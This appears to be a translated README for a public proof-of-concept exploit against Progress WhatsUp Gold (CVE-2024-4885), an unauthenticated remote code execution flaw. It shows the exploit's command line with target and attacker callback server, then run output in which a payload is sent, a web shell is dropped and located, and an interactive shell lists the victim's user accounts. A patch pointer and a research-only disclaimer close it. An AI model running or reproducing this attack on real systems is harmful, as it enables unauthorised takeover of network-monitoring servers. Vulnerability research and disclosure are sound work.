PoC untuk CVE-2024-4885 Kemajuan WhatsUp Gold GetFileWithoutZip Eksekusi Kode Jarak Jauh yang Tidak Diautentikasi (CVE-2024-4885) 
Analisis akar penyebab kerentanan dapat ditemukan di blog saya: https://summoning.team/blog/progress-whatsup-gold-rce-cve-2024-4885/
python3 CVE-2024-4885.py -t http://192.168.0.231:9642 -s 192.168.0.181:1337 -f hax.aspx _______ _ _ _______ _______ _____ __ _ _____ __ _ ______ _______ _______ _______ _______ |______ | | | | | | | | | | | | | | | | ____ | |______ |_____| | | | ______| |_____| | | | | | | |_____| | _| __|__ | _| |_____| . | |______ | | | | | (*) Progress WhatsUp Gold GetFileWithoutZip Unauthenticated Remote Code Execution (CVE-2024-4885) (*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam) (*) Technical details: https://summoning.team/blog/progress-whatsup-gold-rce-cve-2024-4885/ (^_^) Prepare for the Pwnage (^_^) (+) Sending payload to http://192.168.0.231:9642/NmConsole/ReportService.asmx (*) Callback server listening on http://192.168.0.181:1337 (+) Payload sent successfully (*) Checking if target is using HTTPS or HTTP https://192.168.0.231/NmConsole/ (*) Target host: https://192.168.0.231 (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-24.aspx (+) Callback received 192.168.0.231 - - [06/Jul/2024 23:31:30] "GET /Session/Login/?sUsername=admin&sPassword=3,0,0,0,16,0,0,0 HTTP/1.1" 200 - 192.168.0.231 - - [06/Jul/2024 23:31:30] "PUT /api/core/render HTTP/1.1" 200 - (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-25.aspx (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-26.aspx (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-27.aspx (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-28.aspx (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-29.aspx (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-30.aspx (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-31.aspx (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-32.aspx (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-33.aspx (+) Web shell found at -> https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-33.aspx Shell> net user User accounts for ------------------------------------------------------------------------------- Administrator debugger DefaultAccount Guest WDAGUtilityAccount The command completed with one or more errors. Shell>
Perbarui ke versi terbaru atau lakukan mitigasi dengan mengikuti instruksi dalam Progress Advisory
https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-Juni-2024
Sinologi
Tim Pemanggil
Perangkat lunak ini dibuat murni untuk tujuan penelitian akademis dan untuk pengembangan teknik pertahanan yang efektif, dan tidak dimaksudkan untuk digunakan untuk menyerang sistem kecuali jika diizinkan secara eksplisit. Pengelola proyek tidak bertanggung jawab atau berkewajiban atas penyalahgunaan perangkat lunak. Gunakan secara bertanggung jawab.
